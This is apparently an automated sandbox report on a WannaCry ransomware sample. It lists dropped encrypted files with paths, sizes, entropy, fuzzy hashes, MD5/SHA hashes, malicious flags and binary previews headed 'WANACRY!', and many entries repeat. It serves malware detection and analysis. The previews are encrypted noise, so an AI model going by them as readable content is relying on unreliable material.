                                                                                      Preview:WANACRY!....8l.....1e..K...)U.dB..p..;.h=..........&.b.$.S..O.w.GTT*ot.M$s.m.....U..U-...@...KIK*V"...B_..f..[.e"O.8.86.....^...."...x..K.@......'..H..V]..,~a.t"......!.s_...,......k..7'..V....F9.=..C........`..v.t.:].I7~]%._..>|..j.[].n..|E..V....?-bv............!=4..}... ...A.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37464
                                                                                      Entropy (8bit):7.994952762818548
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:gHp9coxbxTksqX4wsiflKZqoa5S/pbVKF4FV2Zzi+932juBNns2mn4i2Yk:scox1Tkf+WkaepbRHbjuBNns2mnT2D
                                                                                      MD5:D910B8C96341D5FDF698B4D31E1B9AE0
                                                                                      SHA1:C25F8C517F0E87D510B451299679331F26061E23
                                                                                      SHA-256:8C5D26A3A8C32C6FA241B501A043F9267735CEAFD95EB97F9916369814406F41
                                                                                      SHA-512:0215FB6B712430D1C812A58E24A504F06A47172B91EE0888CE868FEBD08A10BB32339FEE160430CBA155E1E10B7363A6E7A0C23540665CA50A7259131B53C685
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........[...>....:..).Q.j&..........}...=.Y2Q..|.P/. ..P..t&.`..*'......m..^.......=.......p...P....[.)...K|E....3.=....?..o7.5....G...4...z..N....&6.ME..NU........Oy..j.wK$..r..(9..q...?..-..... ....C...u...2.O^...M...I.. .bi..D]".f&.7G..O......4..........1.t...=>./.o.y.w..wH.r|.s%.{.:0...o.../..)aQ....=$..It]N+....u..*.....W.".K..\....).....0.$cE&v.....]9.f'w^6.......ZK,.....eG..o..C....;.;....V3..*..2.U.7<r.et....m.&A!..C....e..I-..."}h.~.v8P..Q..iCiw.....{...a....1.x..1Y.]O.l.C4%..C0..V.=...B.:.....+5.....@...1..Q2.....o..........._..[.*<Q.V.6F.W. }|.....M.%s.........!..~....;.P.Q...Z..xYC.......&....qb.L............$..../b.e..].........I...RG[..n....y.....F..G.r.x...?.S..>.'..G.r$.'....}.l....H1.A...iB.(0..P..E-Pb.?8..sG^*.....#u...%QM..v....%)...._.vw*....;H..ld-..r...,..6.s..v.......NGPh.N.b....m..ZT....B.k.ob..4[.w.;iR.:^W...21...]OR.;..[./YRjAy.{.`..mO.h.vv..#.....c..W.=u.....M...K..=@.3.k.=.:%..z....qm}n.r .<...2...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37464
                                                                                      Entropy (8bit):7.994952762818548
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:gHp9coxbxTksqX4wsiflKZqoa5S/pbVKF4FV2Zzi+932juBNns2mn4i2Yk:scox1Tkf+WkaepbRHbjuBNns2mnT2D
                                                                                      MD5:D910B8C96341D5FDF698B4D31E1B9AE0
                                                                                      SHA1:C25F8C517F0E87D510B451299679331F26061E23
                                                                                      SHA-256:8C5D26A3A8C32C6FA241B501A043F9267735CEAFD95EB97F9916369814406F41
                                                                                      SHA-512:0215FB6B712430D1C812A58E24A504F06A47172B91EE0888CE868FEBD08A10BB32339FEE160430CBA155E1E10B7363A6E7A0C23540665CA50A7259131B53C685
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........[...>....:..).Q.j&..........}...=.Y2Q..|.P/. ..P..t&.`..*'......m..^.......=.......p...P....[.)...K|E....3.=....?..o7.5....G...4...z..N....&6.ME..NU........Oy..j.wK$..r..(9..q...?..-..... ....C...u...2.O^...M...I.. .bi..D]".f&.7G..O......4..........1.t...=>./.o.y.w..wH.r|.s%.{.:0...o.../..)aQ....=$..It]N+....u..*.....W.".K..\....).....0.$cE&v.....]9.f'w^6.......ZK,.....eG..o..C....;.;....V3..*..2.U.7<r.et....m.&A!..C....e..I-..."}h.~.v8P..Q..iCiw.....{...a....1.x..1Y.]O.l.C4%..C0..V.=...B.:.....+5.....@...1..Q2.....o..........._..[.*<Q.V.6F.W. }|.....M.%s.........!..~....;.P.Q...Z..xYC.......&....qb.L............$..../b.e..].........I...RG[..n....y.....F..G.r.x...?.S..>.'..G.r$.'....}.l....H1.A...iB.(0..P..E-Pb.?8..sG^*.....#u...%QM..v....%)...._.vw*....;H..ld-..r...,..6.s..v.......NGPh.N.b....m..ZT....B.k.ob..4[.w.;iR.:^W...21...]OR.;..[./YRjAy.{.`..mO.h.vv..#.....c..W.=u.....M...K..=@.3.k.=.:%..z....qm}n.r .<...2...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.150996163435644
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEvu1xEQKYEvIdQnacQXr6JW5sctGUOxSIlDsXe83bsXA3W8c9:bkEvCEQKYEv+WrQgWFuSA0e8rsX39
                                                                                      MD5:DA877B59E6A0B70E268E71F1B6A5B9C1
                                                                                      SHA1:02DCA2471E5C6AF83A80EA51A67CC020F2E06B44
                                                                                      SHA-256:F737D08D43E3AF19B8DB8E3837B1634066E079CC3A06248538A6663EC4B03100
                                                                                      SHA-512:3C266DA2369F26BA79E3E7E4A48B3E50DEA1E8ECF85E67C99A739EFAC6B5DF814E31A7B699235DFAB437750645DB284455D375408675537355AB2540C976A1D0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....a~....s.z....<)...$...B..'9#1q.=...P.*.@..x|.o.Y.X.........*..m{.\yv..d...+.pL.z.<. ....Ug... Yh..w.T..(.V3..8!csad...p.<o.y...|w.I....m..&..|ak..>......._..b;-.4...u]J.e.k.4.=]g...g.q.=g...s..q.< cY.1.P......?EL.v#q.._$...@.e..L..s2....j.Vb_.9o.............../.|....$*.QH.O
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.150996163435644
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEvu1xEQKYEvIdQnacQXr6JW5sctGUOxSIlDsXe83bsXA3W8c9:bkEvCEQKYEv+WrQgWFuSA0e8rsX39
                                                                                      MD5:DA877B59E6A0B70E268E71F1B6A5B9C1
                                                                                      SHA1:02DCA2471E5C6AF83A80EA51A67CC020F2E06B44
                                                                                      SHA-256:F737D08D43E3AF19B8DB8E3837B1634066E079CC3A06248538A6663EC4B03100
                                                                                      SHA-512:3C266DA2369F26BA79E3E7E4A48B3E50DEA1E8ECF85E67C99A739EFAC6B5DF814E31A7B699235DFAB437750645DB284455D375408675537355AB2540C976A1D0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....a~....s.z....<)...$...B..'9#1q.=...P.*.@..x|.o.Y.X.........*..m{.\yv..d...+.pL.z.<. ....Ug... Yh..w.T..(.V3..8!csad...p.<o.y...|w.I....m..&..|ak..>......._..b;-.4...u]J.e.k.4.=]g...g.q.=g...s..q.< cY.1.P......?EL.v#q.._$...@.e..L..s2....j.Vb_.9o.............../.|....$*.QH.O
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.139422102742333
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEHSYReSVokGaLWM+USYF+YQ9LTyYkdAyw+1JYeQHp5X/lg+4:bkEH+S+kGYYUSYkf3ETw+1WL/vy
                                                                                      MD5:F7A793BD5D546AD4F4B6C6D1E3CDC604
                                                                                      SHA1:1BBB76BB75C849CB8CA1E3AF0C8CE562F3E92741
                                                                                      SHA-256:6F85BF406665B0F1C05F4B231DA0B98E995811D612D72F8B0A33BB5EEF7DDAE3
                                                                                      SHA-512:CC013C74390A2D83B1488F2792AF915419AF5F6B5A3476CF9E15EE33842AC0A56EA42F7D8D283838478E5A27A8BBE67B04EFC8D3B2F7D70DB931681B84A42BB4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1.....<.[...C`c..x..p..^..?+...nU..A%.X.?..@......It......3.q6..2.I...,..=.....2..-,.s1.....\..h.=....&.`e....zf.z......Q7.^..V .(.0.L........4)..n._KI...dm.n.e.8vh..........pgT(.......q.&.....,..aU.DG..B.X!k!a.G}..:..s4./c...Pw.a`...Y.d.............A.~s]v?.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.139422102742333
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEHSYReSVokGaLWM+USYF+YQ9LTyYkdAyw+1JYeQHp5X/lg+4:bkEH+S+kGYYUSYkf3ETw+1WL/vy
                                                                                      MD5:F7A793BD5D546AD4F4B6C6D1E3CDC604
                                                                                      SHA1:1BBB76BB75C849CB8CA1E3AF0C8CE562F3E92741
                                                                                      SHA-256:6F85BF406665B0F1C05F4B231DA0B98E995811D612D72F8B0A33BB5EEF7DDAE3
                                                                                      SHA-512:CC013C74390A2D83B1488F2792AF915419AF5F6B5A3476CF9E15EE33842AC0A56EA42F7D8D283838478E5A27A8BBE67B04EFC8D3B2F7D70DB931681B84A42BB4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1.....<.[...C`c..x..p..^..?+...nU..A%.X.?..@......It......3.q6..2.I...,..=.....2..-,.s1.....\..h.=....&.`e....zf.z......Q7.^..V .(.0.L........4)..n._KI...dm.n.e.8vh..........pgT(.......q.&.....,..aU.DG..B.X!k!a.G}..:..s4./c...Pw.a`...Y.d.............A.~s]v?.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37512
                                                                                      Entropy (8bit):7.994908594534368
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:Redz/mIbR1LnOJSdipSr/Z7GkI5o4Nq+bEEcVpOSkk:RehT9nOJSqSpGkINqqEDOSkk
                                                                                      MD5:8E49EF5DEA79DB2E22A587B8247C7CF2
                                                                                      SHA1:1EC27F273AA94E8D386F949B67A2187A89D7171E
                                                                                      SHA-256:26C697453797FF1DEFA04C384743B63CA2E9BD61F906A514073C649FEF883A90
                                                                                      SHA-512:0370F7458A06972C7638E138A894DA78BD7200573C665E6CABA1F215BECD1D833AC947CD422286CBB2A473D2CD1CEC9A3E649684738E97820EF5DC378201CDE3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..............s....=.o3ef/3.^*.1yi...GU.VXY....G...+..}......w..H2...r...L..|.1.F.D......G.qb.a.}..j.]X.(aAO.l............W....%|.`Y...;...p.o.,U#...:...~.[.Fh.....?.w..'j..I%.AL.&.}....Y..M.c}..<..*)..h.}@..v...@<.J.).%....1.6.N=....a(....P........n........][..T..7.g.Tb..yMC*..:.*/..,.9[.......L...H.U....... .i.{..}.......m.0=.?v.;..I.a..r.....<m.V#..m...O9.%......b_..I..$..sqE.`..m.5p..sW...q....w.-Ps....k.........?..].2/.k.m}.W..@.8...n...C......{.#....B^.m.X.G._.i....8.Z+...)....^.<tv3..i].......N...T.$../..9.q.6..!.uhAQ...v.9I/...U?.>...V+....)q.......1.)S.P1..(t.h..Y.dq.&U1.(GXG.wy..t...}.v^..=..D.aZ7<.S...,Rn.....\d.c^..|...Z.8..?. _......5A..[......S4.c3....4gX}4.e..]...m..t....a...:.f.:u.G.sW..:Y....VA..v.y..Z......t ...,us.&..2RS.../t2..:....yt!8.8..w.*...Q|a.vo%.........%.J.....a....).D....qs<.0.}Nw[u./P<.g.L..m....%~..h..5.K.!II.:.ua....+{.P.z.}..e.....T.....>...^;.......Q..<S.#.6$......R...H.s....n..........;c......d..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37512
                                                                                      Entropy (8bit):7.994908594534368
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:Redz/mIbR1LnOJSdipSr/Z7GkI5o4Nq+bEEcVpOSkk:RehT9nOJSqSpGkINqqEDOSkk
                                                                                      MD5:8E49EF5DEA79DB2E22A587B8247C7CF2
                                                                                      SHA1:1EC27F273AA94E8D386F949B67A2187A89D7171E
                                                                                      SHA-256:26C697453797FF1DEFA04C384743B63CA2E9BD61F906A514073C649FEF883A90
                                                                                      SHA-512:0370F7458A06972C7638E138A894DA78BD7200573C665E6CABA1F215BECD1D833AC947CD422286CBB2A473D2CD1CEC9A3E649684738E97820EF5DC378201CDE3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..............s....=.o3ef/3.^*.1yi...GU.VXY....G...+..}......w..H2...r...L..|.1.F.D......G.qb.a.}..j.]X.(aAO.l............W....%|.`Y...;...p.o.,U#...:...~.[.Fh.....?.w..'j..I%.AL.&.}....Y..M.c}..<..*)..h.}@..v...@<.J.).%....1.6.N=....a(....P........n........][..T..7.g.Tb..yMC*..:.*/..,.9[.......L...H.U....... .i.{..}.......m.0=.?v.;..I.a..r.....<m.V#..m...O9.%......b_..I..$..sqE.`..m.5p..sW...q....w.-Ps....k.........?..].2/.k.m}.W..@.8...n...C......{.#....B^.m.X.G._.i....8.Z+...)....^.<tv3..i].......N...T.$../..9.q.6..!.uhAQ...v.9I/...U?.>...V+....)q.......1.)S.P1..(t.h..Y.dq.&U1.(GXG.wy..t...}.v^..=..D.aZ7<.S...,Rn.....\d.c^..|...Z.8..?. _......5A..[......S4.c3....4gX}4.e..]...m..t....a...:.f.:u.G.sW..:Y....VA..v.y..Z......t ...,us.&..2RS.../t2..:....yt!8.8..w.*...Q|a.vo%.........%.J.....a....).D....qs<.0.}Nw[u./P<.g.L..m....%~..h..5.K.!II.:.ua....+{.P.z.}..e.....T.....>...^;.......Q..<S.#.6$......R...H.s....n..........;c......d..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.113098878987613
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkERzE2i1VX/WkSKhIl9+5Fuaw+iba0y5VphorPBWvTi7kcdt1+2:bkERm1VvWkSKhs9+5Ffiej7orPsLi7TZ
                                                                                      MD5:C946E690F19E89D67B2230A6955BF4D7
                                                                                      SHA1:4CF1BFD1D2E32337AF4CFCC35213B47D4A0B9D18
                                                                                      SHA-256:712D19E4ED04D0883BF9535C685A205C14E991D24647E9BAA3B14F2B495C23D2
                                                                                      SHA-512:C65465CD16A11FA1E1F67812FD7540DEE40F9657DD15240A0BB75BF0F6A15EC4927D810589A7B3984A1E761292E379E2A922E0AB34DF4E4AF83A55408052BE2D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......x...q.[..A...Z#...vl.w{....J1xS..f.P7+.o*Si.v\K?2N...:..F.Z.a^Q.x.m.s.X.l...{..~!.T7.UL..XN..KH...K...bC..W.%.1.../._.....T..T.Z..V..5k_J+.a.#..LG@.;w..<..).........l..............6.m.h...[....fc..[9..<..A.3..A.1......g.;..$...7..]...3...:.Fs..8..............!k..+.`+.$?%..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.113098878987613
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkERzE2i1VX/WkSKhIl9+5Fuaw+iba0y5VphorPBWvTi7kcdt1+2:bkERm1VvWkSKhs9+5Ffiej7orPsLi7TZ
                                                                                      MD5:C946E690F19E89D67B2230A6955BF4D7
                                                                                      SHA1:4CF1BFD1D2E32337AF4CFCC35213B47D4A0B9D18
                                                                                      SHA-256:712D19E4ED04D0883BF9535C685A205C14E991D24647E9BAA3B14F2B495C23D2
                                                                                      SHA-512:C65465CD16A11FA1E1F67812FD7540DEE40F9657DD15240A0BB75BF0F6A15EC4927D810589A7B3984A1E761292E379E2A922E0AB34DF4E4AF83A55408052BE2D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......x...q.[..A...Z#...vl.w{....J1xS..f.P7+.o*Si.v\K?2N...:..F.Z.a^Q.x.m.s.X.l...{..~!.T7.UL..XN..KH...K...bC..W.%.1.../._.....T..T.Z..V..5k_J+.a.#..LG@.;w..<..).........l..............6.m.h...[....fc..[9..<..A.3..A.1......g.;..$...7..]...3...:.Fs..8..............!k..+.`+.$?%..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.25831717663901
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEsNLy/Z5uuGd6M0r6wkYPuCPNhg6WNm69im1kEkAPTq:bkE3/cty6wuIWNmbVLAPm
                                                                                      MD5:DB0BC55EDE72BFA5CE3BFF9361844FFE
                                                                                      SHA1:24DAAF9563F4CE086488381CB73CE7F9516F4653
                                                                                      SHA-256:6C231ED3C01F9B3C419F34A986D7D156DE89FE9FE6A4FD5B4D558B0A7172F9B0
                                                                                      SHA-512:CA8CF10A1EA74969C95CA144ED9049C15161A5D2AE43E264C2A59C19C9D74CA5C2F9D78490334EDB31ADED14E2D1E0D58B1E948A79FC3ACD53FBC4E25A89333E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....a.h"...1.'...$.V'..sP/t..9.z.z.Gltu.o.[.B.I\.......... .....{.....8.,>...z.+eK.QL\.NC..2.c.....d......%H..T....F...:P...(w.o..Nq-...v...i...g..x.rE...9k.KFb,.j..b..C 8Va.O..Al...H..2EB.,.M.{...Tj../.......1A.a...,......5Xs....2.J..;.........<;d.-............I............b.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.25831717663901
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEsNLy/Z5uuGd6M0r6wkYPuCPNhg6WNm69im1kEkAPTq:bkE3/cty6wuIWNmbVLAPm
                                                                                      MD5:DB0BC55EDE72BFA5CE3BFF9361844FFE
                                                                                      SHA1:24DAAF9563F4CE086488381CB73CE7F9516F4653
                                                                                      SHA-256:6C231ED3C01F9B3C419F34A986D7D156DE89FE9FE6A4FD5B4D558B0A7172F9B0
                                                                                      SHA-512:CA8CF10A1EA74969C95CA144ED9049C15161A5D2AE43E264C2A59C19C9D74CA5C2F9D78490334EDB31ADED14E2D1E0D58B1E948A79FC3ACD53FBC4E25A89333E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....a.h"...1.'...$.V'..sP/t..9.z.z.Gltu.o.[.B.I\.......... .....{.....8.,>...z.+eK.QL\.NC..2.c.....d......%H..T....F...:P...(w.o..Nq-...v...i...g..x.rE...9k.KFb,.j..b..C 8Va.O..Al...H..2EB.,.M.{...Tj../.......1A.a...,......5Xs....2.J..;.........<;d.-............I............b.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1426184
                                                                                      Entropy (8bit):7.999884325361094
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:coGsuvhytEQq9yWjbYGtdRovPXumU2wx5dVLWMf4YMbCB/+SpsAIf21u1QLBR7Ko:czsuvQEQkxRtdRWPNkJn4LbCB/JDIf2r
                                                                                      MD5:6FB7E8C5D8E81234EAE4DD8853BA7D88
                                                                                      SHA1:E53368598D7F39D76281DD8DA38DBF7ED6BAF966
                                                                                      SHA-256:1B8459BE7E9BEDD8C66ADC66591FCEEED3B151607A7F33C1404F4A3D2427C0ED
                                                                                      SHA-512:ED145EAAFDAE9E5513D3515B17150426FE0D4B63FD9FAC85A295533FAE989513FB8B30E4B5F1B29C4A25E0EE1546B426F5BD03175E6EF2BA62B911C7463FFB48
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....K.........i..h..(.6...._{.[...R.r..Sx9bD.C..j.L...2B....2uL.N.P.P.=..E.9...._.jxg.9.]...D9..q.8D.2I......r.x.0.O...I.]}.....2c.&!(.u1..c6........7K..i....WP...g..,..k.M=.a1....Z...}...]2.......L...2g...[6..^/.j.bZ{-y..tq?2U..#.K.KS1..,...)%.g.............?.m..M....a..g$..W.J.4.,.%Z{.'.S.....>....V..7...r...v./..j....{.'......:...Vk.*2..S...N#..?....F6..Ri.S..{....m..X..b....vo.t.{C...Z}P..]...@..j.dL.......V'w^...S.o....Z....Fb....?....`IW.}2.L3.}.$[...ao.[.v..}.w2..e#..-.\Q..g..dqA!...4:...='...;...?.3.g......YSE.@"R*._A`._...............e..'[..Q.8o"~.$..@?u.pp....D..........;..V....b....d..0....&..d..U....V./u..P.$.9j.V.. ..|..6.Q..2.LfD4./._..%..w.,.a.bH...P.."..|...pS_.dj.J1X..p.i6h.a.".J...|.;Y...7+d..9~..Ce.%n...g..w....Tx..W.:<.n.......E...P..^.U.<..;.O...D..p.7.(...M.._..(i......_.z..U...Y......w[?h.xw}S..w3Q<@.1.;...N.k..-.{H.X.~.hh.MG.+%.Bm"."81....G|...o...&..f.u...:.N:.}..b.....\......-x...cEud..J8....A.....BuC.^.,..lW.O.nv
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1426184
                                                                                      Entropy (8bit):7.999884325361094
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:coGsuvhytEQq9yWjbYGtdRovPXumU2wx5dVLWMf4YMbCB/+SpsAIf21u1QLBR7Ko:czsuvQEQkxRtdRWPNkJn4LbCB/JDIf2r
                                                                                      MD5:6FB7E8C5D8E81234EAE4DD8853BA7D88
                                                                                      SHA1:E53368598D7F39D76281DD8DA38DBF7ED6BAF966
                                                                                      SHA-256:1B8459BE7E9BEDD8C66ADC66591FCEEED3B151607A7F33C1404F4A3D2427C0ED
                                                                                      SHA-512:ED145EAAFDAE9E5513D3515B17150426FE0D4B63FD9FAC85A295533FAE989513FB8B30E4B5F1B29C4A25E0EE1546B426F5BD03175E6EF2BA62B911C7463FFB48
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....K.........i..h..(.6...._{.[...R.r..Sx9bD.C..j.L...2B....2uL.N.P.P.=..E.9...._.jxg.9.]...D9..q.8D.2I......r.x.0.O...I.]}.....2c.&!(.u1..c6........7K..i....WP...g..,..k.M=.a1....Z...}...]2.......L...2g...[6..^/.j.bZ{-y..tq?2U..#.K.KS1..,...)%.g.............?.m..M....a..g$..W.J.4.,.%Z{.'.S.....>....V..7...r...v./..j....{.'......:...Vk.*2..S...N#..?....F6..Ri.S..{....m..X..b....vo.t.{C...Z}P..]...@..j.dL.......V'w^...S.o....Z....Fb....?....`IW.}2.L3.}.$[...ao.[.v..}.w2..e#..-.\Q..g..dqA!...4:...='...;...?.3.g......YSE.@"R*._A`._...............e..'[..Q.8o"~.$..@?u.pp....D..........;..V....b....d..0....&..d..U....V./u..P.$.9j.V.. ..|..6.Q..2.LfD4./._..%..w.,.a.bH...P.."..|...pS_.dj.J1X..p.i6h.a.".J...|.;Y...7+d..9~..Ce.%n...g..w....Tx..W.:<.n.......E...P..^.U.<..;.O...D..p.7.(...M.._..(i......_.z..U...Y......w[?h.xw}S..w3Q<@.1.;...N.k..-.{H.X.~.hh.MG.+%.Bm"."81....G|...o...&..f.u...:.N:.}..b.....\......-x...cEud..J8....A.....BuC.^.,..lW.O.nv
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):352008
                                                                                      Entropy (8bit):7.999461778441811
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:WJOcVwY9+vbjwGd3AxmtveaH1Sr9P9bKLoyxacPk0nT/+CjMjRdEYg4:WMcKY4tb5eaHQl9LcPk2/+CjKT
                                                                                      MD5:47F3DF6A503F98980F12C4CDAF67D5BE
                                                                                      SHA1:559D2CED55E6DC256343E665D184114FDC5A7DDD
                                                                                      SHA-256:3F73D389640F41D9F9A9D4DD4DC8689EBCD656A4E3015B2EAFE1638934967D50
                                                                                      SHA-512:D177421AE017CEE1AFED068F760AF0493FE624099F2317D6F1FD2D12F915E654E17DC9058DDDF805EB0D4609025BEC65987E73AAD6B9D7E7ECD35C7355AB5398
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....5.K.z......j $..g..tT/*.u.{.%.......d....Sk..i..`}y.Km9....^..._....M..7I.b.8.9.O..q.?.....J..T..0>..D.H..,.W.^{e_,.F`}..C..=O..LX....Pp?..F)y..<..W@.&.Y.lC.hp.{..uf.d.7...{./d.e\..f.)..8.......p.Z.........<u.H,h.O'fpl..nU...t..D...%5..^l.0......]......,..t..."S.7i....BP_....o../..g...'n........D...7....".q...R.na...Y...\..t./1}...H...c.U.J..q.1.....Y.8.h...h&.le.'.e.x..hpH...,u@......8#.......s..V........... ...t_r.BR.z63.%I.X%..SRO.....H9......y......U...,XB......0q.......}PL...[.........>kg.....__M.w...O..i9+...3...-.....V.Y..z.O.b..Y.....c....L'.+.&..`.>..f$.v.(....+56...2.E<.?..`,.y=.p7.(..W.I..y...z.s...w;^[...1B..QN......S........RHy.C9...u.....o_....].......g........%~.J^......~....~P..]V.N.+......+..7/&K....V<!>...xT...VR..._t.@...#?{Z|...x:f.y.x|{.......SN...B1..66.+P`H..me...*.NF.....*0....@a..:.*....c02@I.{.Y/03WH..0..u..+..j..3.q}..?I.C........M.'...6.I..<..r.....m..)..........1..^.Z..b1.<.N.....13Q.V..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):352008
                                                                                      Entropy (8bit):7.999461778441811
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:WJOcVwY9+vbjwGd3AxmtveaH1Sr9P9bKLoyxacPk0nT/+CjMjRdEYg4:WMcKY4tb5eaHQl9LcPk2/+CjKT
                                                                                      MD5:47F3DF6A503F98980F12C4CDAF67D5BE
                                                                                      SHA1:559D2CED55E6DC256343E665D184114FDC5A7DDD
                                                                                      SHA-256:3F73D389640F41D9F9A9D4DD4DC8689EBCD656A4E3015B2EAFE1638934967D50
                                                                                      SHA-512:D177421AE017CEE1AFED068F760AF0493FE624099F2317D6F1FD2D12F915E654E17DC9058DDDF805EB0D4609025BEC65987E73AAD6B9D7E7ECD35C7355AB5398
                                                                                      Malicious:true
                                                                                      Reputation:low
